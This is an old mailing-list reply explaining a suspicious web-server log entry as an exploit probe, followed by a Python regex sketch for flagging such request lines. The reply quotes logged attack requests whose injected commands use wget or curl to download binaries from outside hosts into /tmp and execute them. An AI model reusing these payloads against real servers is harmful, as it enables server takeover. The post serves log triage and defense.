From: Peter H. <pe...@en...> - 2006-01-15 22:22:00
dimitri pater wrote:
> does anybody know what the third line in my logfile means? It looks
> suspicious to me...
>
> 2006/01/15 08:10:30 HTTP INFO 219.129.25.220 <http://219.129.25.220> -
> GET /ttp://verify.qq.com/getimage/paycenterqqcard?0.8475128964591452
> HTTP/1.1

Suspicious how? Is "verify.qq.com" the address of your site? Is the rest of the URL roughly how it should look and you're concerned only about the incorrect "ttp://" part in front? Or do you mean none of that is even remotely valid for your site?

If I saw that exact line in my own logs (which are obviously not for a qq.com site), I'd simply conclude it was one of the many attempts to exploit a bug in some product that script kiddies and zombies hammer at all of us all day long. I've seen stuff much more obscure than that, and consider most such a mere curiosity (or educational about just how flawed some software can be).

(Here's a small sampling:

"CONNECT 168.95.5.169:25 HTTP/1.0"
"GET http://www.intel.com/ HTTP/1.1"
"GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1"
"GET /level/16/exec/-///pwd HTTP/1.1"

and these less benign beauties which are likely turning machines the world over into zombies (though obviously non-Microsoft servers):

"GET /tellafriend/inc/tell_a_friend.inc.php?script_root=http://geocitie s.com/zamelmania/fbi.gif?&cmd=cd /tmp;curl -O suxtefute.com/sess_3539283e27d73cae29fe2b80f9293f59;perl sess_3539283e27d73c ae29fe2b80f9293f59 HTTP/1.1"

"GET /modules/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_ path=http://81.174.26.111/cmd.gif?&cmd=cd /tmp;wget 216.15.209.4/criman;chmod 744 criman;./criman;echo YYY;echo| HTTP/1.1"

"GET /cgi-bin/awstats.pl?configdir=|echo;echo YYY;cd /tmp;wget 209.136. 48.69/mirela;chmod +x mirela;./mirela;echo YYY;echo| HTTP/1.1"
)

-Peter
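A log-triage sketch for request lines of the kinds quoted in the message above, added here as an example and not part of the original post. The label names and the sample lines (documentation addresses and `.example` hosts) are constructed for illustration, and the choice of what to flag is an assumption, not a complete ruleset.

```python
import re
from urllib.parse import unquote

# METHOD, target, version. The target is matched greedily because hostile
# request lines often carry raw spaces inside the query string.
REQUEST_LINE = re.compile(r"^([A-Z]+) (.+) HTTP/\d\.\d$")
SCHEME = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)
SHELL_META = re.compile(r"[;|`]|\$\(")

def classify(request_line):
    """Return sorted descriptive labels for one logged request line."""
    m = REQUEST_LINE.match(request_line.strip())
    if not m:
        return ["unparseable"]
    method, target = m.groups()
    labels = set()
    if method == "CONNECT":
        labels.add("connect-method")      # asks the server to tunnel to host:port
    elif SCHEME.match(target):
        labels.add("absolute-uri")        # full URL where a path is expected
    elif SCHEME.match(target.lstrip("/")):
        labels.add("scheme-in-path")      # e.g. "/ttp://host/..." as a path
    query = target.partition("?")[2]
    for pair in query.split("&"):
        # A parameter whose value is itself a URL: remote-include pattern.
        if SCHEME.match(unquote(pair.partition("=")[2])):
            labels.add("url-in-parameter")
    # Shell separators anywhere in the decoded query string.
    if SHELL_META.search(unquote(query)):
        labels.add("shell-metachar")
    return sorted(labels) or ["plain"]

# Constructed sample request lines, one per pattern.
SAMPLES = [
    "GET /index.html HTTP/1.1",
    "CONNECT 192.0.2.10:25 HTTP/1.0",
    "GET http://www.example.com/ HTTP/1.1",
    "GET /ttp://verify.example/getimage?0.84 HTTP/1.1",
    "GET /inc/page.inc.php?script_root=http://198.51.100.7/x.gif?&cmd=cd /tmp;echo YYY HTTP/1.1",
    "GET /cgi-bin/stats.pl?configdir=|echo;echo YYY| HTTP/1.1",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(", ".join(classify(line)), "<-", line)
```
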